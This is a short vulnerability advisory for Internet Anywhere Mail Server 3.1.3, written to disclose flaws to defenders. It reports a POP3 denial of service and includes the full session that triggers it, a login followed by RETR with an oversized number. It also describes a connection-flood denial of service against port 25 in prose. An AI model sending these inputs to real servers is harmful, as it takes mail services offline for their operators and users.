COMMAND

    Internet Anywhere Mail Server

SYSTEMS AFFECTED

    Internet Anywhere Mail Server Ver.3.1.3

PROBLEM

    Nobuo Miwa found following.

    1. RETR DoS in POP service
    ==========================

        +OK POP3 Welcome to somewhere.domain using the Internet Anywhere
        Mail Server Version: 3.1.3. Build: 1065 by True North Software,
        Inc.
        USER yellow
        +OK valid
        PASS pikapika
        +OK Authorized
        RETR 111111111111111111111111

    That's all. The Server could be dead at a little bit after atoi().
    They should check return value of atoi().

    2. multiple connections to port 25 DoS
    ======================================
    This is simple  game, too.   Too much connect()s  about 3000, then
    you will see connection  refused. After that, too  much connect()s
    again about 800,  then you can't  connect anymore.   It depends on
    memory  size  (tested  on  128MB  RAM,total  256MB).   They should
    check connection status.

SOLUTION

    Fix is in development.